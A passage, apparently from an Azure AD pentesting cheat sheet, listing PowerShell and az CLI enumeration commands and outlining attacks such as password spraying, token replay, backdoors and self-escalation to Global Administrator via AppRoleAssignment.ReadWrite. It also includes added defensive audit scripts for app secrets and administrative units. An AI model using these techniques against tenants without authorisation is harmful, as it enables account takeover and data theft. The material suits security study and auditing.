Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get devices managed using Intune (compliant devices)
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device (the AU member list is queried with -Id, as for groups)
$deviceObjId = (Get-AzureADDevice -SearchString "<device_name>").ObjectId
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $deviceObjId} }

If a device (VM) is AzureAD joined, users from AzureAD are able to log in. Moreover, if the logged-in user is the Owner of the device, he will be a local administrator.

Applications

Apps are App Registrations in the portal (not Enterprise Applications). But each App Registration creates an Enterprise Application (Service Principal) with the same name. Moreover, if the App is a multi-tenant App, another Enterprise Application (Service Principal) is created in that tenant with the same name.

When an App is generated, 2 types of permissions are granted:

  • Permissions given to the Service Principal

  • Permissions the app can have and use on behalf of the user.

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

Azure AD

Azure AD Connect synchronizes users' identities between Azure AD and on-premises Active Directory. This allows for a seamless sign-on experience to various applications and resources.

Enumeration

  1. User Enumeration: Enumerate users through the Graph API, looking for common usernames or service accounts.

  2. Group Enumeration: Enumerate groups to understand the organization's structure and potential points of privilege escalation.

  3. Application Enumeration: Discover applications registered in Azure AD to identify potential targets for further attacks.

Password Attacks

  1. Password Spraying: Attempt a few common passwords across many accounts to avoid account lockouts.

  2. Brute Force: Perform a brute force attack to crack weak passwords or gain unauthorized access.

Token Manipulation

  1. Token Impersonation: Steal or forge tokens to impersonate users and access resources illegitimately.

  2. Token Replay: Capture and replay tokens to gain unauthorized access to resources.

Federation Attacks

  1. Federation Trust: Exploit misconfigurations in federation trust to gain unauthorized access.

  2. Federation Impersonation: Impersonate a federated domain to access resources in Azure AD.

Privilege Escalation

  1. Role Escalation: Elevate privileges by assigning higher roles to compromised accounts.

  2. Application Role Mapping: Abuse misconfigured application roles to gain excessive permissions.

Persistence

  1. Backdoors: Create backdoors in Azure AD configurations for persistent access.

  2. Service Principal: Abuse service principals for long-term access to resources.

Data Exfiltration

  1. User Data: Extract sensitive user data from Azure AD for malicious purposes.

  2. Application Data: Steal or manipulate application data stored in Azure AD.

Remediation

  1. Multi-Factor Authentication: Enforce MFA to protect against password attacks and unauthorized access.

  2. Regular Auditing: Conduct regular audits to detect and mitigate security issues in Azure AD configurations.

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

Azure AD

Enumerate Azure AD roles

  1. Description: Enumerate Azure AD roles assigned to users or groups.

  2. Attack: An attacker can use this information to understand the level of access different users or groups have within Azure AD.

  3. Defense: Regularly review and audit Azure AD roles assigned to users and groups to ensure least privilege access.

  4. Tool: Azure PowerShell

  5. Code:

    Get-AzureADUserMembership -ObjectId <UserObjectId>

  6. Impact: Information disclosure of Azure AD roles assigned to users or groups.

  7. Recommendation: Implement the principle of least privilege when assigning Azure AD roles to users and groups.

# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get credentials (passwords/certificates) of the Apps (Get-AzADAppCredential needs an app, so pipe them in)
Get-AzADApplication | Get-AzADAppCredential

An app with the permission AppRoleAssignment.ReadWrite can escalate to Global Administrator by granting itself the role. For more information check this.

The application password is a secret string that the application uses to prove its identity when requesting a token. If you find this password you can access as the Service Principal inside the tenant. Note that this password is only visible when it is generated (you can change it, but you cannot retrieve it again). The owner of the application can add a password to it (so he can impersonate it). Logins as these service principals are not marked as risky and they will not have MFA.
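A defender-side audit that ties the points above together (the permissions granted to an app's Service Principal, the AppRoleAssignment.ReadWrite escalation and the client secrets an owner can add): an added Python example, not code from the original page, that checks Graph-style application and appRoleAssignment objects for high-privilege application permissions and for expired or long-lived credentials. All sample objects and ids are constructed placeholders, and the 365-day credential lifetime limit is an assumed policy.

```python
"""Audit Graph application objects for two risk signals: high-privilege
application permissions granted to the app's service principal (app role
assignments such as AppRoleAssignment.ReadWrite.All) and client secrets or
certificates that are expired or longer-lived than policy allows.
Sample data below is constructed; ids are placeholders, not real Graph ids."""
from datetime import datetime, timedelta, timezone

# Application permissions on Microsoft Graph that let a service principal grant
# itself further permissions or directory roles (the escalation path above).
HIGH_RISK_APP_ROLES = {
    "AppRoleAssignment.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "Directory.ReadWrite.All",
    "Application.ReadWrite.All",
}
MAX_CREDENTIAL_LIFETIME = timedelta(days=365)  # assumed organisational policy


def resolve_app_roles(assignments, resource_app_roles):
    """Map appRoleAssignment objects (appRoleId) to permission names using the
    resource service principal's appRoles list (id -> value). Unknown ids are
    kept as-is so they stay visible in the report."""
    id_to_value = {role["id"]: role["value"] for role in resource_app_roles}
    return [id_to_value.get(a["appRoleId"], a["appRoleId"]) for a in assignments]


def risky_permissions(assignments, resource_app_roles):
    names = resolve_app_roles(assignments, resource_app_roles)
    return sorted(n for n in names if n in HIGH_RISK_APP_ROLES)


def _parse_graph_time(ts):
    # Graph returns ISO-8601 timestamps with a trailing 'Z'
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def credential_findings(app, now):
    """Flag passwordCredentials (client secrets) and keyCredentials
    (certificates) that are expired or exceed MAX_CREDENTIAL_LIFETIME."""
    findings = []
    for kind in ("passwordCredentials", "keyCredentials"):
        for cred in app.get(kind) or []:
            start = _parse_graph_time(cred["startDateTime"])
            end = _parse_graph_time(cred["endDateTime"])
            if end < now:
                findings.append((kind, cred["keyId"], "expired"))
            elif end - start > MAX_CREDENTIAL_LIFETIME:
                findings.append((kind, cred["keyId"], "lifetime exceeds policy"))
    return findings


def audit(applications, assignments_by_app_id, resource_app_roles, now):
    """applications: objects as returned by GET /v1.0/applications, with the
    app's owners (GET /applications/{id}/owners) merged in as 'owners'.
    assignments_by_app_id: appId -> the matching service principal's
    appRoleAssignments (GET /servicePrincipals/{id}/appRoleAssignments)."""
    report = {}
    for app in applications:
        entry = {
            "risky_permissions": risky_permissions(
                assignments_by_app_id.get(app["appId"], []), resource_app_roles),
            "credential_findings": credential_findings(app, now),
            "owners": app.get("owners", []),  # anyone listed here can add a new secret
        }
        if entry["risky_permissions"] or entry["credential_findings"]:
            report[app["displayName"]] = entry
    return report


# ---- constructed sample data (placeholder ids, not real tenant data) ----
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)

SAMPLE_RESOURCE_APP_ROLES = [  # appRoles of the Microsoft Graph resource SP
    {"id": "00000000-0000-0000-0000-00000000aaaa", "value": "User.Read.All"},
    {"id": "00000000-0000-0000-0000-00000000bbbb", "value": "AppRoleAssignment.ReadWrite.All"},
]

SAMPLE_APPLICATIONS = [
    {"displayName": "HR Sync", "appId": "app-1", "owners": ["alice@corp.onmicrosoft.com"],
     "passwordCredentials": [{"keyId": "k1", "startDateTime": "2022-01-01T00:00:00Z",
                              "endDateTime": "2024-01-01T00:00:00Z"}],
     "keyCredentials": []},
    {"displayName": "Automation Bot", "appId": "app-2", "owners": [],
     "passwordCredentials": [{"keyId": "k2", "startDateTime": "2024-01-01T00:00:00Z",
                              "endDateTime": "2024-12-01T00:00:00Z"}],
     "keyCredentials": [{"keyId": "k3", "startDateTime": "2020-01-01T00:00:00Z",
                         "endDateTime": "2030-01-01T00:00:00Z"}]},
    {"displayName": "Tidy App", "appId": "app-3", "owners": [],
     "passwordCredentials": [], "keyCredentials": []},
]

SAMPLE_ASSIGNMENTS = {
    "app-1": [{"appRoleId": "00000000-0000-0000-0000-00000000aaaa"}],
    "app-2": [{"appRoleId": "00000000-0000-0000-0000-00000000bbbb"},
              {"appRoleId": "unknown-role-id"}],
}

if __name__ == "__main__":
    for name, entry in audit(SAMPLE_APPLICATIONS, SAMPLE_ASSIGNMENTS,
                             SAMPLE_RESOURCE_APP_ROLES, NOW).items():
        print(name, entry)
```

With live data, feed the output of the Graph calls named in the docstrings (or of the az ad app / az ad sp queries above) into audit() instead of the constructed samples.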

Difference between Applications & (Enterprise Applications or Service Principals)

Difference between an Application and a Service Principal in Azure:

  • Application/App Registrations: Are applications that exist in your Azure AD
    (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

  • Service Principal/Enterprise Applications: Security objects in your Azure AD that can have privileges over the Azure directory and are linked to your application or to a third-party application
    (Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

  • An admin might need to approve the granted permissions if they are very sensitive.

An application can run in a third-party tenant, and once you start using it and grant it access, an Enterprise Application/Service Principal is created in your tenant to give it access to the information it needs:
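The following audit script is an added example (not code from the original page or from HackTricks): it lists every app registration that holds an application password, who owns it, when each secret expires, and the enterprise application (service principal) that shares its AppId. It assumes an existing Connect-AzureAD session with permission to read applications and service principals.

```powershell
# Added audit example: report app registrations that have application passwords.
# Owners can add a new password and then act as the app, so they are listed too.
# Assumes Connect-AzureAD has already been run with read rights on applications.
function Get-AppPasswordReport {
    foreach ($app in Get-AzureADApplication -All $true) {
        $secrets = @(Get-AzureADApplicationPasswordCredential -ObjectId $app.ObjectId)
        if ($secrets.Count -eq 0) { continue }

        # Owners are effectively holders of the app identity.
        $owners = Get-AzureADApplicationOwner -ObjectId $app.ObjectId | ForEach-Object {
            if ($_.UserPrincipalName) { $_.UserPrincipalName } else { $_.DisplayName }
        }

        # The service principal that actually signs in with the password shares the
        # AppId with the app registration; it may not exist for unused registrations.
        $sp   = Get-AzureADServicePrincipal -Filter "AppId eq '$($app.AppId)'"
        $spId = if ($sp) { $sp.ObjectId } else { '(no service principal)' }

        foreach ($s in $secrets) {
            $lifetimeDays = $null
            if ($s.StartDate -and $s.EndDate) {
                $lifetimeDays = ($s.EndDate - $s.StartDate).TotalDays
            }
            [pscustomobject]@{
                App              = $app.DisplayName
                AppId            = $app.AppId
                ServicePrincipal = $spId
                SecretKeyId      = $s.KeyId
                EndDate          = $s.EndDate
                Expired          = ($s.EndDate -lt (Get-Date))
                # Long-lived secrets deserve rotation first: sign-ins with them are
                # not flagged as risky and are never challenged for MFA.
                LongLived        = ($lifetimeDays -gt 365)
                Owners           = ($owners -join '; ')
            }
        }
    }
}

Get-AppPasswordReport | Sort-Object EndDate | Format-Table -AutoSize
```

Pair the report with the tenant's service principal sign-in logs: a secret that is long-lived, owned by a user who no longer needs it, and actively signing in is the combination to rotate or remove first.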

Administrative Units

They are used for better management of users.

Administrative units restrict permissions in a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists, so they can manage users only in the region that they support.

Therefore, you can assign roles to the administrative unit, and the members of it will have these roles.


# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
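The script below is an added example (not code from the original page or from HackTricks) that turns the commands above into a delegation report: for every administrative unit it resolves each scoped role membership to a role name and a delegate, and counts how many objects the scope covers. It assumes the AzureAD Preview module and an existing Connect-AzureAD session with directory read rights.

```powershell
# Added audit example: who holds which directory role scoped to each administrative
# unit, and how large that scope is. Assumes Connect-AzureAD has already been run.
function Get-AdminUnitDelegationReport {
    # Scoped memberships only carry the RoleId, so resolve role ids to names once.
    # Get-AzureADDirectoryRole returns only roles that have been activated; any
    # id it cannot resolve is reported as the raw RoleId below.
    $roleNames = @{}
    Get-AzureADDirectoryRole | ForEach-Object { $roleNames[$_.ObjectId] = $_.DisplayName }

    foreach ($au in Get-AzureADMSAdministrativeUnit) {
        $members = @(Get-AzureADMSAdministrativeUnitMember -Id $au.Id)
        $scoped  = @(Get-AzureADMSScopedRoleMembership -Id $au.Id)

        if ($scoped.Count -eq 0) {
            # A unit with members but no scoped roles delegates nothing; list it
            # anyway so stale units are visible to the reviewer.
            [pscustomobject]@{
                AdminUnit     = $au.DisplayName
                Role          = '(none)'
                Delegate      = '(none)'
                ScopedObjects = $members.Count
            }
            continue
        }

        foreach ($srm in $scoped) {
            $role = $roleNames[$srm.RoleId]
            if (-not $role) { $role = $srm.RoleId }
            $who = $srm.RoleMemberInfo.UserPrincipalName
            if (-not $who) { $who = $srm.RoleMemberInfo.DisplayName }
            [pscustomobject]@{
                AdminUnit     = $au.DisplayName
                Role          = $role
                Delegate      = $who
                ScopedObjects = $members.Count
            }
        }
    }
}

Get-AdminUnitDelegationReport | Sort-Object AdminUnit, Role | Format-Table -AutoSize
```

Review any row where a high-privilege role is scoped to a unit whose member count approaches the whole directory: at that point the unit no longer limits the delegation in practice.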

Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP) is a security service that uses automated detection and remediation to protect user identities in Azure Active Directory from compromise. AIP continuously monitors and assesses the risk of user sign-ins and identity configurations, automatically applying appropriate security measures, such as requiring multi-factor authentication or blocking potentially dangerous activities. This helps organizations prevent identity-based security breaches.

Flow:

  1. Azure AD Identity Protection monitors user activities and collects data about user sign-ins, authentication events, and other relevant activities.

  2. The service uses machine learning algorithms to analyze this data and detect potential security threats.

  3. Azure AD Identity Protection assigns a risk level to the threat (e.g. a sign-in) and, if necessary, generates an alert to perform an automatic action.

Azure AD Password Protection (APP)

Azure AD Password Protection (APP) is a security feature that helps prevent weak passwords in Azure Active Directory by enforcing strong password policies. APP blocks commonly used weak passwords and their variants, which reduces the risk of password-related breaches. It can be applied both at the cloud level and in on-premises Active Directory, improving overall password security across the organization.
